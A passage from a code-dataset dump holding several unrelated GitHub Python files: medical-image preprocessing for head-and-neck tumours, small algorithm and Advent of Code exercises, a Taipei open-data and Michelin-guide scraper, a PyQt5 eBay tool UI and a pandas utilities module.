path_to_reference_image_nrrd=img_dir, \n binary=2, \n return_type='sitk_object', \n output_dir=seg_save_dir)\n print('combine successfully')\n except Exception as e:\n print(seg_id, e)\n if seg_names == []:\n print('no GTV!')\n img_ids.append(img_id)\n seg_namess.append(seg_names)\n # save mask information\n df = pd.DataFrame({'pat id': img_ids, 'seg id': seg_namess})\n df.to_csv(csv_save_dir, index=False) \n\n\ndef get_pn_seg(proj_dir):\n \"\"\"\n 1) combine p_seg and n_seg to a 4d nii image;\n 2) p_seg and n_seg in different channels;\n Args:\n proj_dir {path} -- project path\n Returns:\n save nii files\n Raise issues:\n none\n \"\"\"\n p_seg_path = proj_dir + '/raw_seg_p'\n n_seg_path = proj_dir + '/raw_seg_n'\n pn_seg_path = proj_dir + '/raw_seg_pn'\n p_n_seg_path = proj_dir + '/raw_seg_p_n'\n img_path = proj_dir + '/raw_img'\n if not os.path.exists(p_n_seg_path):\n os.makedirs(p_n_seg_path)\n fns = [i for i in sorted(os.listdir(pn_seg_path))]\n for i, fn in enumerate(fns):\n try:\n pat_id = fn.split('.')[0]\n print(i, pat_id)\n # image\n img_dir = img_path + '/' + fn\n img = sitk.ReadImage(img_dir)\n arr = sitk.GetArrayFromImage(img)\n # primary tumor\n p_seg_dir = p_seg_path + '/' + fn\n if os.path.exists(p_seg_dir):\n p_seg = sitk.ReadImage(p_seg_dir)\n p_seg = sitk.GetArrayFromImage(p_seg)\n p_seg[p_seg != 0] = 1\n #print('p_seg shape:', p_seg.shape)\n else:\n print('no primary segmentation...')\n p_seg = np.zeros(shape=arr.shape)\n # node\n n_seg_dir = n_seg_path + '/' + fn\n if os.path.exists(n_seg_dir):\n n_seg = sitk.ReadImage(n_seg_dir)\n n_seg = sitk.GetArrayFromImage(n_seg)\n n_seg[n_seg != 0] = 2\n else:\n print('no node segmentation...')\n n_seg = np.zeros(shape=arr.shape)\n # combine P and N to one np arr\n p_n_seg = np.add(p_seg, n_seg).astype(int)\n # change dtype, otherwise nrrd cannot be read\n p_n_seg = np.asarray(p_n_seg, dtype='uint8')\n # some voxels from P and N have overlap\n p_n_seg[p_n_seg == 3] = 1\n sitk_obj = sitk.GetImageFromArray(p_n_seg)\n sitk_obj.SetSpacing(img.GetSpacing())\n sitk_obj.SetOrigin(img.GetOrigin())\n # write new nrrd\n writer = sitk.ImageFileWriter()\n writer.SetFileName(p_n_seg_path + '/' + pat_id + '.nrrd')\n writer.SetUseCompression(True)\n writer.Execute(sitk_obj)\n except Exception as e:\n print(pat_id, e)\n\n\ndef interp_reg_crop(proj_dir, root_dir, tumor_type, image_format, crop_shape):\n \"\"\"\n Rigid Registration - followed by top crop\n \"\"\"\n print('------start registration--------')\n img_raw_dir = proj_dir + '/raw_img'\n seg_p_n_raw_dir = proj_dir + '/raw_seg_p_n'\n seg_pn_raw_dir = proj_dir + '/raw_seg_pn'\n seg_p_raw_dir = proj_dir + '/raw_seg_p'\n seg_n_raw_dir = proj_dir + '/raw_seg_n'\n\n img_crop_dir = proj_dir + '/crop_img_160'\n seg_p_n_crop_dir = proj_dir + '/crop_seg_p_n_160'\n seg_pn_crop_dir = proj_dir + '/crop_seg_pn_160'\n seg_p_crop_dir = proj_dir + '/crop_seg_p'\n seg_n_crop_dir = proj_dir + '/crop_seg_n'\n if not os.path.exists(img_crop_dir):\n os.makedirs(img_crop_dir)\n if not os.path.exists(seg_p_n_crop_dir):\n os.makedirs(seg_p_n_crop_dir)\n if not os.path.exists(seg_pn_crop_dir):\n os.makedirs(seg_pn_crop_dir)\n if not os.path.exists(seg_p_crop_dir):\n os.makedirs(seg_p_crop_dir)\n if not os.path.exists(seg_n_crop_dir):\n os.makedirs(seg_n_crop_dir)\n\n img_dirs = [i for i in sorted(glob.glob(img_raw_dir + '/*nrrd'))]\n seg_p_n_dirs = [i for i in sorted(glob.glob(seg_p_n_raw_dir + '/*nrrd'))]\n seg_pn_dirs = [i for i in sorted(glob.glob(seg_pn_raw_dir + '/*nrrd'))]\n seg_p_dirs = [i for i in sorted(glob.glob(seg_p_raw_dir + '/*nrrd'))]\n seg_n_dirs = [i for i in sorted(glob.glob(seg_n_raw_dir + '/*nrrd'))]\n if tumor_type == 'p_n':\n seg_dirs = seg_p_n_dirs\n seg_crop_dir = seg_p_n_crop_dir\n elif tumor_type == 'pn':\n seg_dirs = seg_pn_dirs\n seg_crop_dir = seg_pn_crop_dir\n elif tumor_type == 'p':\n seg_dirs = seg_p_dirs\n seg_crop_dir = seg_p_crop_dir\n elif tumor_type == 'n':\n seg_dirs = seg_n_dirs\n seg_crop_dir = seg_n_crop_dir\n img_ids = []\n bad_ids = []\n bad_scans = []\n count = 0\n # get register template\n fixed_img_dir = root_dir + '/DFCI/img_interp/10020741814.nrrd'\n fixed_img = sitk.ReadImage(fixed_img_dir, sitk.sitkFloat32)\n for img_dir in img_dirs:\n img_id = img_dir.split('/')[-1].split('.')[0]\n #print(img_id)\n for seg_dir in seg_dirs:\n seg_id = seg_dir.split('/')[-1].split('.')[0]\n #print(seg_id)\n if img_id == seg_id:\n img_ids.append(img_id)\n count += 1\n print(count, img_id)\n # load img and seg\n img = sitk.ReadImage(img_dir, sitk.sitkFloat32)\n seg = sitk.ReadImage(seg_dir, sitk.sitkFloat32)\n # --- crop full body scan ---\n z_img = img.GetSize()[2]\n z_seg = seg.GetSize()[2]\n if z_img < 105:\n print('This is an incomplete scan!')\n bad_scans.append(seg_id)\n else:\n if z_img > 200:\n img = crop_full_body(img, int(z_img * 0.65))\n seg = crop_full_body(seg, int(z_seg * 0.65))\n try:\n # --- interpolation for image and seg to 1x1x3 ---\n # interpolate images\n print('interplolate')\n img_interp = interpolate(\n patient_id=img_id, \n path_to_nrrd=img_dir, \n interpolation_type='linear', #\"linear\" for image\n new_spacing=(1, 1, 3), \n return_type='sitk_obj', \n output_dir='',\n image_format=image_format)\n # interpolate segs\n seg_interp = interpolate(\n patient_id=img_id, \n path_to_nrrd=seg_dir, \n interpolation_type='nearest_neighbor', # nearest neighbor for label\n new_spacing=(1, 1, 3), \n return_type='sitk_obj', \n output_dir='',\n image_format=image_format) \n # --- registration for image and seg to 1x1x3 --- \n # register images\n print('register')\n reg_img, fixed_img, moving_img, final_transform = nrrd_reg_rigid( \n patient_id=img_id, \n moving_img=img_interp, \n output_dir='', \n fixed_img=fixed_img,\n image_format=image_format)\n # register segmentations\n reg_seg = sitk.Resample(\n seg_interp, \n fixed_img, \n final_transform, \n sitk.sitkNearestNeighbor, \n 0.0, \n moving_img.GetPixelID())\n # --- crop ---\n print('cropping')\n crop_top(\n patient_id=img_id,\n img=reg_img,\n seg=reg_seg,\n crop_shape=crop_shape,\n return_type='sitk_object',\n output_img_dir=img_crop_dir,\n output_seg_dir=seg_crop_dir,\n image_format=image_format)\n print('successfully crop!')\n except Exception as e:\n bad_ids.append(img_id)\n print(img_id, e)\n print('bad ids:', bad_ids)\n print('incomplete scans:', bad_scans)\n\n\ndef crop(proj_dir, tumor_type, crop_shape, image_format): \n \"\"\"\nWith TOP-CROP HPC ### NEED TO RUN FOR image_crop, image_crop_p, and image_crop_n \n WILL ONLY WORK WITH SPACING = 1,1,3\n \"\"\"\n print('------start cropping--------')\n img_reg_dir = proj_dir + '/reg_img2'\n seg_p_n_reg_dir = proj_dir + '/reg_seg_p_n2'\n seg_pn_reg_dir = proj_dir + '/reg_seg_pn2'\n seg_p_reg_dir = proj_dir + '/reg_seg_p2'\n seg_n_reg_dir = proj_dir + '/reg_seg_n2'\n img_crop_dir = proj_dir + '/crop_img'\n seg_p_n_crop_dir = proj_dir + '/crop_seg_p_n2'\n seg_pn_crop_dir = proj_dir + '/crop_seg_pn2'\n seg_p_crop_dir = proj_dir + '/crop_seg_p2'\n seg_n_crop_dir = proj_dir + '/crop_seg_n2'\n if not os.path.exists(img_crop_dir):\n os.makedirs(img_crop_dir)\n if not os.path.exists(seg_p_n_crop_dir):\n os.makedirs(seg_p_n_crop_dir)\n if not os.path.exists(seg_pn_crop_dir):\n os.makedirs(seg_pn_crop_dir)\n if not os.path.exists(seg_p_crop_dir):\n os.makedirs(seg_p_crop_dir)\n if not os.path.exists(seg_n_crop_dir):\n os.makedirs(seg_n_crop_dir)\n img_reg_dirs = [i for i in sorted(glob.glob(img_reg_dir + '/*nrrd'))]\n seg_p_n_reg_dirs = [i for i in sorted(glob.glob(seg_p_n_reg_dir + '/*nrrd'))]\n seg_pn_reg_dirs = [i for i in sorted(glob.glob(seg_pn_reg_dir + '/*nrrd'))]\n seg_p_reg_dirs = [i for i in sorted(glob.glob(seg_p_reg_dir + '/*nrrd'))]\n seg_n_reg_dirs = [i for i in sorted(glob.glob(seg_n_reg_dir + '/*nrrd'))]\n if tumor_type == 'p_n':\n seg_dirs = seg_p_n_reg_dirs\n seg_crop_dir = seg_p_n_crop_dir\n elif tumor_type == 'pn':\n seg_dirs = seg_pn_reg_dirs\n seg_crop_dir = seg_pn_crop_dir\n elif tumor_type == 'p':\n seg_dirs = seg_p_reg_dirs\n seg_crop_dir = seg_p_crop_dir\n elif tumor_type == 'n':\n seg_dirs = seg_n_reg_dirs\n seg_crop_dir = seg_n_crop_dir\n # registration for image and seg\n img_ids = []\n count = 0\n for img_dir in img_reg_dirs:\n img_id = img_dir.split('/')[-1].split('.')[0]\n for seg_dir in seg_dirs:\n seg_id = seg_dir.split('/')[-1].split('.')[0]\n if img_id == seg_id:\n count += 1\n print(count, img_id)\n img_ids.append(img_id)\n try:\n crop_top(\n patient_id=img_id,\n img_dir=img_dir,\n seg_dir=seg_dir,\n crop_shape=crop_shape,\n return_type='sitk_object',\n output_img_dir=img_crop_dir,\n output_seg_dir=seg_crop_dir,\n image_format=image_format)\n except Exception as e:\n print(e, 'crop failed!')\n\n\ndef main():\n\n root_dir = '/mnt/aertslab/USERS/Zezhong/HN_OUTCOME'\n #proj_dir = root_dir + '/DFCI/new_curation'\n proj_dir = '/mnt/kannlab_rfa/Zezhong/HeadNeck/Data/BWH'\n tumor_type = 'p_n'\n image_format = 'nrrd'\n crop_shape = (160, 160, 64)\n #crop_shape = (172, 172, 76)\n #step = 'combine_mask'\n\n #for step in ['combine_mask', 'get_pn_seg', 'interp_reg_crop']:\n for step in ['get_seg_info']:\n if step == 'change_name':\n change_img_name(proj_dir)\n elif step == 'get_seg_info':\n get_seg_info(proj_dir)\n elif step == 'combine_mask':\n for tumor_type in ['p']:\n combine_mask2(proj_dir, tumor_type)\n elif step == 'get_pn_seg':\n get_pn_seg(proj_dir)\n elif step == 'interp_reg_crop':\n interp_reg_crop(proj_dir, root_dir, tumor_type, image_format, crop_shape)\n elif step == 'crop':\n crop(proj_dir, tumor_type, crop_shape, image_format)\n\n\nif __name__ == '__main__':\n \n main()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"xmuyzz/HeadNeckCancer-Outcome","sub_path":"data_curation/archive/bwh_preprocess.py","file_name":"bwh_preprocess.py","file_ext":"py","file_size_in_byte":25852,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"3139471454","text":"# BOJ 6148번\nimport sys\nfrom collections import deque\n\n\ndef solve(sum_heights: int):\n minimum = -1\n\n # 기저 사례\n if len(cows) == 1:\n return cows[0]\n\n if sum_heights < top:\n minimum = get_value(sum_heights)\n return minimum - top\n\n last = cows.popleft()\n to_sub.append(last)\n val = solve(sum_heights - last)\n if val != -1:\n minimum = val\n return minimum\n\n return minimum\n\n\ndef get_value(sum_heights):\n minimum = -1\n for i in range(1 << len(to_sub)):\n value = sum_heights\n for j in range(len(to_sub)):\n if i & (1 << j):\n value += to_sub[j]\n if value >= top and (minimum == -1 or minimum > value):\n minimum = value\n return minimum\n\n\n\"\"\"\ncows = deque([1, 3, 3, 5, 6])\nsum_heights = 14\ntop = 16\nto_sub = [1, 3]\nprint(solve(sum_heights))\n# print(get_value(sum_heights))\n\n\"\"\"\nn, top = map(int, sys.stdin.readline().split())\narr = []\nto_sub = []\nsum_heights = 0\nfor _ in range(n):\n cow = int(sys.stdin.readline())\n arr.append(cow)\n sum_heights += cow\narr.sort()\ncows = deque(arr)\n# print(solve(sum_heights))\nsys.stdout.write(str(solve(sum_heights)))","repo_name":"mrbartrns/algorithm-and-structure","sub_path":"BOJ/exaustive_search/bookshelf.py","file_name":"bookshelf.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75046450493","text":"#!/usr/bin/env python\n\n#cd Documents/Advent_of_code\n\n#ADVENT OF CODE\n#8TH DECEMBER\n#day8_input.txt\n\n#The file consists of 656 lines, which are instructions comprised of acc (accumulator), jmp (jump) and nop (no operation) operations plus a numerical argument\n# acc: The accumulator value (starts at 0) is modified by the value of the argument. The line immediately below is executed next.\n# jmp: The next line to be executed is specified by the argument relative to the current line.\n# nop: Does nothing. The line immediately below is executed next.\n\n#Part 1: Currently the file is an infinite loop. Before any line gets executed a second time, what is the accumulator value? Answer: 1594\n#Part 2: Fix the file by changing one 'jmp' to a 'nop' or one 'nop' to a 'jmp'. What is the accumulator? Answer: \n\nwith open ('day8_input.txt','r') as advent_object:\n advent = advent_object.readlines()\n\n #Turn each line into a list of ['operator', argument, times executed]\n index = 0\n for line in advent:\n newLine = (line.strip()).split(' ')\n newArg = int(newLine[1])\n advent[index] = [newLine[0], newArg, 0]\n index += 1\n \n #Define a function which executes lines until it's about to repeat one\n def run_loop():\n accumulator = 0\n index = 0\n executes = 0\n while advent[index][2] < 1:\n if advent[index][0] == 'acc':\n #print('acc = ' + str(accumulator) + '; index = ' + str(index) + '; executes = ' + str(executes))\n accumulator += advent[index][1]\n advent[index][2] += 1\n index += 1\n executes += 1\n elif advent[index][0] == 'jmp':\n #print('acc = ' + str(accumulator) + '; index = ' + str(index) + '; executes = ' + str(executes))\n advent[index][2] += 1 \n index += advent[index][1]\n executes += 1\n elif advent[index][0] == 'nop':\n #print('acc = ' + str(accumulator) + '; index = ' + str(index) + '; executes = ' + str(executes))\n advent[index][2] += 1\n index += 1\n executes += 1\n print('accumulator: ' + str(accumulator))\n return accumulator\n\n #print(run_loop())\n\n for line in advent:\n if line[0] == 'jmp':\n try:\n line[0] == 'nop'\n run_loop()\n except advent[index][2] > 1:\n continue\n elif line[0] == 'nop':\n try:\n line[0] == 'jmp'\n run_loop()\n except advent[index][2] > 1:\n continue\n\n#0 and 87 are wrong","repo_name":"Jay-Miles/advent_of_code","sub_path":"aoc_2020/day_8.py","file_name":"day_8.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28117982936","text":"#!/usr/bin/env python3\n# -*-coding: utf-8-*-\n#\n# Author: Chiata Liu\n# Date: 24-Nov-2020\n# 公庫處: ���市府公開資料\n#\n# 本程式更新資料:\n# 1. revenue\n# 2. population\n# 3. food play\nimport warnings\nwarnings.filterwarnings('ignore')\nimport logging\nimport os\nimport re\nimport datetime\nfrom dateutil import relativedelta\nimport pdfplumber\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import unquote\nimport shutil\n# package\nfrom package import d04_play, d04_food, d04_population, d04_download_img\nfrom package import d03_revenue\n# args\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--foodplay\", required=False,\n\thelp=\"download food play or not;(y/n)\")\nargs = vars(ap.parse_args())\n\n# config\nENCODE = 'utf-8'\nPROJECT = 'tch'\nPATH = '/scraper/tch'\n# PATH = './'\nTMP_DIR = os.path.join(PATH, 'dataset')\nOUTPUT_DIR = os.path.join(PATH, 'output')\nLOG_DIR = os.path.join(PATH, 'log')\nIMG_DIR = os.path.join(OUTPUT_DIR, 'SHAREIMG')\ntoday = datetime.datetime.today()\ntoday_yyyymmdd = today.strftime('%Y%m%d')\nthis_month = today.strftime('%Y%m')\nlast_month = (today + relativedelta.relativedelta(months=-1)).strftime('%Y%m')\n# mkdir\nfor d in [TMP_DIR, OUTPUT_DIR, LOG_DIR, IMG_DIR]:\n if not os.path.exists(d):\n os.mkdir(d)\n \n# logging config\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(name)s %(levelname)s %(message)s',\n datefmt='%m-%d %H:%M',\n handlers = [logging.FileHandler(f'{LOG_DIR}/{PROJECT}_{today_yyyymmdd}.txt', 'a', 'utf-8'),])\n\n# start\nstart = datetime.datetime.now() \nlogging.info('START')\nprint('START')\n# mv file\ntry:\n file_list = [f for f in os.listdir(OUTPUT_DIR) if os.path.isfile(os.path.join(OUTPUT_DIR, f))]\n for f in file_list:\n # shutil.move(os.path.join(OUTPUT_DIR, f), os.path.join(OUTPUT_DIR, 'his'))\n shutil.copy(os.path.join(OUTPUT_DIR, f), os.path.join(OUTPUT_DIR, 'his'))\n os.remove(os.path.join(OUTPUT_DIR, f))\n logging.info(f'move {len(file_list)} files')\n print(f'move {len(file_list)} files')\nexcept Exception as e:\n logging.warning(f'mv file: {e}') \n print(f'mv file: {e}') \n \n# url pool\n# monthly\npopu_url = 'https://ca.gov.taipei/News_Content.aspx?n=8693DC9620A1AABF&sms=D19E9582624D83CB&s=E70E0ADF8510073C'\nsource_url = 'https://data.taipei/api/dataportal/get-dataset-detail?id=09b12b01-c562-4a0e-9aeb-93312ce57372'\ndept_url = 'https://dof.gov.taipei/News.aspx?n=4D21C7BE105121C3&sms=CB3C416EA7B4104E'\n\n# prn\n# food\nfood_url_1 = 'https://guide.michelin.com/tw/zh_TW/restaurants/1-star-michelin' # 一星\nfood_url_2 = 'https://guide.michelin.com/tw/zh_TW/restaurants/2-stars-michelin' # 二星\nfood_url_3 = 'https://guide.michelin.com/tw/zh_TW/restaurants/3-stars-michelin' # 三星\nfood_url_4 = 'https://guide.michelin.com/tw/zh_TW/restaurants/bib-gourmand' # 富比登\nfood_url_5 = 'https://guide.michelin.com/tw/zh_TW/restaurants/the-plate-michelin' # 餐盤\n# play\nplay_url = 'https://www.travel.taipei/zh-tw/attraction/all-regions?mode=list&sortby=tripadvisor&page=1'\n\nif __name__ == '__main__':\n # part1: TCH_POPULATION\n try:\n popu_param = d04_population.download_file(popu_url, TMP_DIR)\n popu_df = d04_population.create_dataset(*popu_param)\n popu_df.to_csv(f'{OUTPUT_DIR}/TCH_POPULATION.{popu_param[2]}', \n index=False)\n except Exception as e:\n logging.error(f'part1: TCH_POPULATION, error:{e}')\n print(f'part1: TCH_POPULATION, error:{e}')\n\n # part2: TCH_REVENUE\n try:\n rev_snap_yyyymmdd = d03_revenue.download_data(source_url, dept_url, TMP_DIR)\n # check file 1 & file 2 snap date\n if rev_snap_yyyymmdd[0] == rev_snap_yyyymmdd[1]:\n final_df = d03_revenue.create_dataset(TMP_DIR, rev_snap_yyyymmdd[0], rev_snap_yyyymmdd[2])\n else:\n print(rev_snap_yyyymmdd[0])\n print(rev_snap_yyyymmdd[1])\n final_df.to_csv(f'{OUTPUT_DIR}/TCH_REVENUE.{rev_snap_yyyymmdd[2]}', index=False)\n except Exception as e:\n logging.error(f'part2: TCH_REVENUE, error:{e}')\n print(f'part2: TCH_REVENUE, error:{e}')\n\n # part6: TCH_FOOD_PLAY\n # FOOD 米其林\n if args['foodplay'] == 'y':\n print(f\"food pay: {args['foodplay']}\")\n try:\n food_url_list = [food_url_1,food_url_2,food_url_3,food_url_4,food_url_5]\n condition = [('STAR', 1), ('STAR', 2), ('STAR', 3), ('FORK', 0), ('PLATE', 0)]\n food = pd.DataFrame()\n for url, (guide_type, star) in zip(food_url_list, condition):\n try:\n data = d04_food.create_dataset(url)\n except Exception as e:\n logging.error(f'part6: TCH_FOOD, error: {e}, phase 1, {url}')\n print(f'part6: TCH_FOOD, error: {e}, phase 1, {url}')\n try:\n tmp_df = d04_food.data_clean(data, guide_type=guide_type, star=star)\n except Exception as e:\n logging.error(f'part6: TCH_FOOD, error: {e}, phase 2, {url}')\n print(f'part6: TCH_FOOD, error: {e}, phase 2, {url}')\n food = pd.concat([food, tmp_df])\n food = food.reset_index(drop=True)\n except Exception as e:\n logging.error(f'part6: TCH_FOOD, error:{e}')\n print(f'part6: TCH_FOOD, error:{e}')\n try:\n # PLAY 景點\n play_url_list = d04_play.create_url_list(play_url)\n info_df = pd.DataFrame()\n for url in play_url_list:\n try:\n info_list = d04_play.create_info_list(url)\n info_df = pd.concat([info_df, pd.DataFrame(info_list)])\n info_df = info_df[list(info_list[0].keys())].reset_index(drop=True)\n except Exception as e:\n logging.error(f'part6: TCH_PLAY, error: {e}, {url}')\n print(f'part6: TCH_PLAY, error: {e}, {url}')\n info_df = info_df.where(info_df.notnull(), None)\n play = d04_play.create_final_df(info_df) \n except Exception as e:\n logging.error(f'part6: TCH_PLAY, error:{e}')\n print(f'part6: TCH_PLAY, error:{e}')\n\n # combined food & play \n # download img\n try:\n tch_food_play = pd.concat([food, play]).reset_index(drop=True)\n tch_food_play = d04_download_img.rebuild_dataset(tch_food_play, IMG_DIR, today_yyyymmdd)\n tch_food_play['PIC'] = tch_food_play['PIC'].apply(lambda x: x.replace('./output', '')) \n tch_food_play['SNAP_DATE'] = tch_food_play['SNAP_DATE'].apply(lambda x: datetime.datetime.strptime(x.strftime('%Y%m%d'),'%Y%m%d'))\n tch_food_play['STAR'] = tch_food_play['STAR'].astype(float)\n # 中英文名稱格式變更 20201224\n tch_food_play['C_NAME'] = tch_food_play['C_NAME'].apply(lambda x: x.upper() if x.replace(' ', '').isalpha() else x)\n tch_food_play['E_NAME'] = tch_food_play['E_NAME'].fillna('')\n tch_food_play['E_NAME'] = tch_food_play['E_NAME'].apply(lambda x: x.replace('-', ' ').capitalize())\n tch_food_play['E_NAME'] = tch_food_play['E_NAME'].apply(lambda x: None if x == '' else x) \n # 處理編碼問題 20210114\n tch_food_play['E_NAME'] = tch_food_play['E_NAME'].apply(lambda x: unquote(x, 'utf-8') if x is not None else None) \n tch_food_play = tch_food_play.where(tch_food_play.notnull(), None)\n tch_food_play.to_csv(f'{OUTPUT_DIR}/TCH_FOOD_PLAY.{today_yyyymmdd}',\n index=False,\n encoding=ENCODE)\n except Exception as e:\n logging.error(f'part6: TCH_PLAY, error:{e}')\n print(f'part6: TCH_PLAY, error:{e}')\n\n end = datetime.datetime.now() \n delta = str(end - start)\n logging.info(f'DONE, time:{delta}')\n print(f'DONE, time:{delta}')\n logging.shutdown() \n","repo_name":"jasonliu1990/scraper","sub_path":"tch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"487779752","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport api\nimport sys\nimport threading\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n self.folder = None\n\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(515, 515)\n MainWindow.setWindowTitle\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n MainWindow.setCentralWidget(self.centralwidget)\n\n self.formLayout = QtWidgets.QFormLayout(self.centralwidget)\n self.formLayout.setObjectName(\"formLayout\")\n\n spacerItem = QtWidgets.QSpacerItem(\n 20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n\n self.HeaderLabel = QtWidgets.QLabel(self.centralwidget)\n self.HeaderLabel.setTextFormat(QtCore.Qt.AutoText)\n self.HeaderLabel.setObjectName(\"HeaderLabel\")\n\n self.tokenInput = QtWidgets.QPlainTextEdit(self.centralwidget)\n self.tokenInput.setObjectName(\"tokenInput\")\n\n self.startDateLabel = QtWidgets.QLabel(self.centralwidget)\n self.startDateLabel.setObjectName(\"startDateLabel\")\n\n self.startDatePicker = QtWidgets.QDateEdit(self.centralwidget)\n self.startDatePicker.setMinimumDate(QtCore.QDate(1900, 1, 1))\n self.startDatePicker.setCalendarPopup(True)\n self.startDatePicker.setDate(QtCore.QDate(2014, 1, 1))\n self.startDatePicker.setObjectName(\"startDatePicker\")\n\n self.endDateLabel = QtWidgets.QLabel(self.centralwidget)\n self.endDateLabel.setObjectName(\"endDateLabel\")\n\n self.endDatePicker = QtWidgets.QDateEdit(self.centralwidget)\n self.endDatePicker.setMinimumDate(QtCore.QDate(1900, 1, 1))\n self.endDatePicker.setCalendarPopup(True)\n self.endDatePicker.setDate(QtCore.QDate(2014, 1, 1))\n self.endDatePicker.setObjectName(\"endDatePicker\")\n\n self.browseLabel = QtWidgets.QLabel(self.centralwidget)\n self.browseLabel.setObjectName(\"browseLabel\")\n\n self.browseButton = QtWidgets.QPushButton(self.centralwidget)\n self.browseButton.setObjectName(\"browseButton\")\n self.browseButton.clicked.connect(self.launchBrowse)\n\n self.getButton = QtWidgets.QPushButton(self.centralwidget)\n self.getButton.setObjectName(\"getButton\")\n self.getButton.clicked.connect(self.onClick)\n\n self.status_dateRange = QtWidgets.QLabel(\n self.centralwidget) # current date range (max 120 days)\n self.status_dateRange.setObjectName(\"status_dateRange\")\n self.status_numberofEntries = QtWidgets.QLabel(\n self.centralwidget) # total entires in that date range\n self.status_numberofEntries.setObjectName(\"status_numberofEntries\")\n self.status_pageNumber = QtWidgets.QLabel(\n self.centralwidget) # page number\n self.status_pageNumber.setObjectName(\"status_pageNumber\")\n self.status_totalNumberOfEntries = QtWidgets.QLabel(\n self.centralwidget) # total entires\n self.status_totalNumberOfEntries.setObjectName(\n \"status_totalNumberOfEntries\")\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n self.errorMessage = QtWidgets.QLabel(self.centralwidget)\n self.errorMessage.setObjectName(\"errorMessage\")\n\n # Mount everything to the form in order\n self.mountWidgetInForm(self.HeaderLabel)\n self.mountWidgetInForm(self.tokenInput)\n self.formLayout.setItem(\n self.indexCounter, QtWidgets.QFormLayout.LabelRole, spacerItem)\n self.indexCounter += 1\n self.mountWidgetInForm(self.startDateLabel)\n self.mountWidgetInForm(self.startDatePicker)\n self.mountWidgetInForm(self.endDateLabel)\n self.mountWidgetInForm(self.endDatePicker)\n self.mountWidgetInForm(self.browseLabel)\n self.mountWidgetInForm(self.browseButton)\n self.formLayout.setItem(\n self.indexCounter, QtWidgets.QFormLayout.LabelRole, spacerItem)\n self.indexCounter += 1\n self.mountWidgetInForm(self.getButton)\n self.mountWidgetInForm(self.errorMessage)\n self.formLayout.setItem(\n self.indexCounter, QtWidgets.QFormLayout.LabelRole, spacerItem)\n self.indexCounter += 1\n self.mountWidgetInForm(self.status_dateRange)\n self.mountWidgetInForm(self.status_pageNumber)\n self.mountWidgetInForm(self.status_numberofEntries)\n self.mountWidgetInForm(self.status_totalNumberOfEntries)\n\n self.retranslateUi(MainWindow)\n\n indexCounter = 0\n\n def launchBrowse(self):\n fileDialogue = QtWidgets.QFileDialog()\n fileDialogue.setFileMode(QtWidgets.QFileDialog.Directory)\n self.folder = fileDialogue.getExistingDirectory(\n self.centralwidget, \"Choose Folder\", \"\")\n if not self.folder is None:\n self.browseLabel.setText(self.folder)\n\n def mountWidgetInForm(self, widget):\n self.formLayout.setWidget(\n self.indexCounter, QtWidgets.QFormLayout.LabelRole, widget)\n self.indexCounter += 1\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\n \"MainWindow\", \"eBay Product Details Getter\"))\n self.tokenInput.setPlaceholderText(\n _translate(\"MainWindow\", \"Paste Token\"))\n self.startDateLabel.setText(_translate(\"MainWindow\", \"Start Date\"))\n self.endDateLabel.setText(_translate(\"MainWindow\", \"End Date\"))\n self.getButton.setText(_translate(\"MainWindow\", \"Get Product Details\"))\n self.HeaderLabel.setText(_translate(\n \"MainWindow\", \"eBay Details Getter\"))\n self.browseButton.setText(_translate(\"MainWindow\", \"Browse\"))\n self.browseLabel.setText(_translate(\n \"MainWindow\", \"Choose File(s) Destination\"))\n\n def setErrorMessage(self, msg):\n self.errorMessage.setText(\"An error has occured:<br>%s\" % msg)\n\n def clearErrorMessage(self):\n self.errorMessage.setText(\"\")\n\n def onClick(self):\n\n self.getButton.setDisabled(True)\n self.clearErrorMessage()\n try:\n if not self.folder is None:\n handleThread = threading.Thread(\n target=api.handleClick, args=(self,))\n handleThread.start()\n else:\n self.setErrorMessage(\"No folder selected.\")\n self.getButton.setDisabled(False)\n except Exception as e:\n self.setErrorMessage(e)\n self.getButton.setDisabled(False)\n","repo_name":"chastain1337/eBayProductDetailsGetter","sub_path":"src/main/python/mainWindowUI.py","file_name":"mainWindowUI.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25991430399","text":"\"\"\"\n Utilities\n\"\"\"\n\nfrom collections import OrderedDict\n\nimport numpy as np\nimport pandas as pd\n\nfrom . import constants as c\n\n\ndef resample(df, period, mdate):\n \"\"\"Resample and fill missing periods\"\"\"\n\n index = pd.date_range(df.index.min(), mdate, freq=period)\n df = df.resample(period).sum().reindex(index).fillna(0)\n\n # If working with years, cast the index to integer\n if period == \"YS\":\n df.index = df.index.year\n\n return df\n\n\ndef serie_to_dict(serie):\n \"\"\"Transform a serie to a dict\"\"\"\n\n # If index is datetime transform to string\n if np.issubdtype(serie.index, np.datetime64):\n serie.index = serie.index.strftime(\"%Y-%m-%d\")\n\n return serie.apply(lambda x: round(x, 2)).to_dict()\n\n\ndef series_to_dicts(series):\n \"\"\"Transform a dict with series to a dict of dicts\"\"\"\n\n out = OrderedDict()\n\n for name, x in series.items():\n out[name] = serie_to_dict(x)\n\n return out\n\n\ndef time_average(dfi, months=12, exponential=False, center=False):\n \"\"\"\n Do some time average\n\n Args:\n dfi: input dataframe 